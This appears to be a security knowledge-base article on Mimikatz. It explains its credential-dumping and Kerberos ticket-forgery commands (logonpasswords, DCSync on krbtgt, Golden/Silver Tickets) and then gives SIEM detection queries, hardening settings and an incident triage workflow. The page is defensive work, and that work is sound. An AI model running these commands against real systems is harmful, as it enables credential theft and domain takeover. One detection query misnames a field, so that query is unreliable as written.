Tools

T1003

Mimikatz

How Mimikatz extracts plaintext passwords, NTLM hashes, and Kerberos tickets from Windows memory — and how analysts detect it running in their environment with Event IDs, Sysmon rules, and SIEM queries.

View on Graph

What Mimikatz Is and What It Extracts From Windows Memory

  • Mimikatz is an open-source post-exploitation tool developed by Benjamin Delpy that extracts plaintext passwords, NTLM hashes, Kerberos tickets, PINs, and certificates from Windows memory.
  • MITRE ATT&CK maps credential dumping to T1003 (OS Credential Dumping) with sub-techniques: T1003.001 (LSASS Memory), T1003.002 (Security Account Manager), T1003.006 (DCSync).
  • Mimikatz is the reference implementation for all of these techniques.
  • The tool is not malware — it is a research tool that interacts with Windows authentication subsystems at the API level — but it is used in virtually every ransomware attack and APT intrusion because it enables lateral movement (map AD attack paths with BloodHound), privilege escalation, and persistence.

Credential Extraction Commands — What Mimikatz Actually Does

LSASS Memory Dump (sekurlsa::logonpasswords)

The most famous Mimikatz command. It accesses the LSASS process (Local Security Authority Subsystem Service) and extracts credentials stored in memory — including plaintext passwords, NTLM hashes, and Kerberos tickets.

mimikatz # sekurlsa::logonpasswords

What it extracts:

Credential TypeFormatHow the Attacker Uses It
Plaintext passwordusername:domain:passwordImmediate authentication — no cracking needed
NTLM hashusername:domain:LM:NT::: Pass-the-Hash lateral movement
Kerberos TGTBase64-encoded ticketSilver/Golden Ticket forgery
Kerberos AES keys128/256-bit keysModern Kerberos authentication

Why this works: Windows caches credentials in LSASS so users can seamlessly access network resources without re-entering passwords. WDigest (disabled in Windows 8.1+/2012 R2+) stored plaintext passwords in memory by default. Even without WDigest, NTLM hashes and Kerberos tickets remain accessible via sekurlsa::logonpasswords.

DCSync (lsadump::dcsync)

A more powerful technique that does not require code execution on a Domain Controller. Instead, the attacker uses a Domain Admin account to replicate domain data from a DC — just like another DC would. This gives them every user’s NTLM hash and Kerberos key in the domain.

mimikatz # lsadump::dcsync /user:krbtgt

Why DCSync is so dangerous: It extracts the krbtgt account hash, which allows the attacker to forge Golden Tickets — Kerberos TGTs that grant access to any resource in the domain. DCSync does not leave a process access event on the target DC because it uses DRSUAPI (Directory Replication Service) — a legitimate domain replication protocol.

SAM Registry Dump (lsadump::sam)

Dumps the local SAM (Security Account Manager) registry hive to extract local user password hashes. Requires local administrator privileges.

mimikatz # lsadump::sam

Kerberos Ticket Extraction and Manipulation

CommandPurpose
kerberos::listList all cached Kerberos tickets
kerberos::ptt ticket.kirbiPass-the-Ticket — inject a stolen Kerberos ticket into the current session
kerberos::golden /user:admin /domain:corp.com /sid:S-1-5-... /krbtgt:hashForge a Golden Ticket (valid for any resource)
kerberos::silver /user:admin /domain:corp.com /sid:S-1-5-... /target:DC.corp.com /rc4:hash /service:cifsForge a Silver Ticket (valid for a specific service)

Token Manipulation (token::elevate)

Switches Mimikatz’s execution context to SYSTEM privileges. Essential because LSASS runs as SYSTEM — Mimikatz needs SYSTEM access to read LSASS memory.

mimikatz # token::elevate
mimikatz # sekurlsa::logonpasswords

Detection — How to Find Mimikatz Running in Your Environment

Mimikatz is detectable at multiple layers: process-level signatures, event log patterns, network behavior, and memory artifacts. The most effective detection combines all four.

Detection Layer 1 — Process and Command-Line Detection

Sysmon Event ID 1 (Process Creation) with CommandLine logging:

Mimikatz often uses distinctive command-line patterns, especially when launched via PowerShell or Cobalt Strike:

IndicatorWhat to Watch For
Process namemimikatz.exe, mimikatz64.exe, mimikatz32.exe, but attackers frequently rename the binary
Command-line argumentssekurlsa::logonpasswords, lsadump::dcsync, kerberos::golden, lsadump::sam, token::elevate
Debug privilege enablementMimikatz calls SeDebugPrivilege — visible in Sysmon Event ID 10 (Process Access)
LSASS process access by non-LSASS processThe single strongest indicator of credential dumping

SPL query — detect Mimikatz command-line patterns:

index=windows sourcetype=WinEventLog:Sysmon EventCode=1
| search CommandLine IN ("*sekurlsa::logonpasswords*", "*lsadump::dcsync*", "*lsadump::sam*", "*kerberos::golden*", "*token::elevate*")
| eval severity = "CRITICAL — Mimikatz or similar credential dumping tool detected"
| table _time, Computer, User, Image, CommandLine, severity

SPL query — detect LSASS process access by non-LSASS processes (Sysmon Event ID 10) — run in Splunk:

index=windows sourcetype=WinEventLog:Sysmon EventCode=10
| search TargetImage="*lsass.exe" SourceImage!="*wmiprvse.exe" SourceImage!="*svchost.exe" SourceImage!="*Lsaiso.exe"
| stats count, values(SourceImage) as SourceProcesses by Computer, TargetImage, GrantedAccess
| eval alert = if(GrantAccess=0x1FFFFF, "HIGH — LSASS memory read by non-standard process — credential dumping likely", "MEDIUM — LSASS accessed by non-standard process — investigate")
| table _time, Computer, SourceProcesses, GrantedAccess, alert

GrantedAccess codes that indicate credential dumping:

Access CodeMeaningDetection Priority
0x1FFFFFFull process access (PROCESS_ALL_ACCESS) — Mimikatz needs this to read LSASS memoryCRITICAL
0x001F0FFFSubset of all access, still includes PROCESS_VM_READHIGH
0x00100000PROCESS_QUERY_LIMITED_INFORMATION — normalLOW

Detection Layer 2 — Windows Security Event Logs

Event ID 4688 (Process Creation with CommandLine):

If Sysmon is not deployed, native Windows Event ID 4688 (when configured with command-line auditing) can detect Mimikatz:

index=windows sourcetype=WinEventLog:Security EventCode=4688
| search CommandLine IN ("*sekurlsa*", "*logonpasswords*", "*dcsync*", "*golden*")
| eval alert = "CRITICAL — potential credential dumping detected via Windows Event 4688"
| table _time, Computer, SubjectUserName, ProcessName, CommandLine

Event ID 4670 (Process Access - SACL auditing):

When SACLs are configured on LSASS, Event 4670 logs access attempts:

auditpol /set /subcategory:"Detailed Process Tracking" /success:enable /failure:enable

Then query:

index=windows sourcetype=WinEventLog:Security EventCode=4670
| search ObjectName="*lsass.exe" Accesses="*PROCESS_ALL_ACCESS*"

Detection Layer 3 — PowerShell and Script-Based Detection

Mimikatz is frequently loaded in-memory via PowerShell (Reflective DLL Loading) to avoid writing the binary to disk:

SPL query — detect Mimikatz in PowerShell logs:

index=windows sourcetype="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventID=4103
| search ScriptBlockText IN ("*mimikatz*", "*Mimikatz*", "*Invoke-Mimikatz*", "*sekurlsa*", "*DCSync*", "*logonpasswords*")
| eval alert = "CRITICAL — Mimikatz loaded in PowerShell — in-memory credential dumping"
| table _time, Computer, UserID, ScriptBlockText, alert

SPL query — detect PowerShell reflection loading (no Mimikatz string, anomalous behavior):

index=windows sourcetype="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventID=4104
| search ScriptBlockText="*System.Reflection.Assembly*Load*" ScriptBlockText="*byte[*"
| eval alert = "HIGH — PowerShell loading .NET assembly from byte array — possible reflective DLL injection"
| table _time, Computer, ScriptBlockText, alert

KQL query — detect Mimikatz via PowerShell in Microsoft 365 Defender:

DeviceProcessEvents
| where FileName == "powershell.exe" or FileName == "pwsh.exe"
| where ProcessCommandLine has_all ("sekurlsa", "logonpasswords") or
        ProcessCommandLine has_any ("Invoke-Mimikatz", "DCSync", "mimikatz")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine
| sort by Timestamp desc

Detection Layer 4 — Network Indicators

While Mimikatz is primarily a host-based tool, DCSync uses DRSUAPI replication — which is detectable on the network:

IndicatorDescription
DRSUAPI replication request from a non-DC hostOnly Domain Controllers should request domain replication
Increased LDAP traffic to a DCDCSync uses DSGetNCChanges — seen in LDAP query logs
SMB named pipe \PIPE\lsarpc access from non-system accountLSARPC access used by DCSync

SPL query — detect DCSync via Directory Service log (Event ID 4662):

index=windows sourcetype=WinEventLog:Security EventCode=4662
| search AccessMask="0x100" PropertyName="*DS-Replication-Get-Changes*"
| eval alert = "CRITICAL — DCSync detected via Directory Service access"
| table _time, Computer, SubjectUserName, ObjectName, PropertyName, alert

Detection Layer 5 — Memory Artifacts

If you have access to a memory dump (from a forensic acquisition):

ArtifactWhat to Look For
LSASS memory stringsmimikatz, sekurlsa, wdigest.dll in LSASS process memory
Alternate Data StreamsMimikatz hidden in ADS of legitimate files
Process hollowingmimikatz.exe (renamed) injected into svchost.exe, RuntimeBroker.exe, or other system processes

Prevention — Making Mimikatz Extraction Harder

ControlWhat It ProtectsImplementation
Credential Guard (LSA Protection)LSASS memory — prevents even SYSTEM-level access to credentialsEnable via Group Policy: Computer Configuration > Administrative Templates > System > Device Guard > Turn On Virtualization Based Security
WDigest disabledPlaintext password storageSet HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential to 0
Restricted Admin Mode (RDP)Credential caching during RDP sessionsNew-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name DisableRestrictedAdmin -Value 0
Debug privilege revocationPrevents non-admin access to process memoryRemove SeDebugPrivilege from non-admin groups via GPO
LSASS Protection (RunAsPPL)Prevents non-Microsoft processes from accessing LSASSSet HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL to 1
ASR Rules (Attack Surface Reduction)Blocks LSASS credential theftEnable: “Block credential stealing from the Windows local security authority subsystem (lsass.exe)”

Implementation order (most effective first):

  1. Credential Guard + LSASS RunAsPPL — stops the vast majority of mimikatz attacks
  2. Disable WDigest — prevents plaintext password extraction
  3. ASR Rule for LSASS — blocks the process access pattern
  4. Enable command-line logging — detects what gets past the first three layers

Mimikatz Triage — Investigation Workflow

Step 1: Confirm the Detection

FindingConfidenceAction
Sysmon Event ID 10: non-LSASS process with 0x1FFFFF access to LSASSHIGHProceed to Step 2
Windows Event 4688 with sekurlsa::logonpasswords commandCRITICALImmediate containment
PowerShell script block contains Invoke-MimikatzHIGHProceed to Step 2
Event 4662: DCSync replication from non-DC hostCRITICALImmediate containment

Step 2: Determine Scope

  • Which account executed Mimikatz? Was it a standard user (escalated), or an admin? Check Event 4688 for SubjectUserName.
  • What credentials were extracted? Any user logged on to the compromised system had their credentials cached in LSASS — assume all are compromised.
  • How was Mimikatz delivered? Dropped as a file? In-memory PowerShell? Cobalt Strike execute-assembly?

Step 3: Immediate Containment

  1. Isolate the host — disconnect from the network immediately
  2. Check for lateral movement — search for pass-the-hash authentication from the compromised host (Event 4624 Logon Type 3 with same NTLM hash)
  3. Reset the krbtgt password — if DCSync was performed, assume Golden Tickets exist
  4. Reset all service account passwords — service account hashes are cached in LSASS
  5. Rotate all credentials that were active on the compromised system during the extraction window

Step 4: Forensic Preservation

  • Capture a full memory dump (Mimikatz artifacts persist until the system is rebooted)
  • Capture the original binary or PowerShell script that loaded Mimikatz
  • Preserve Sysmon and Windows Event Logs with a 30-second offset before and after the event

Sources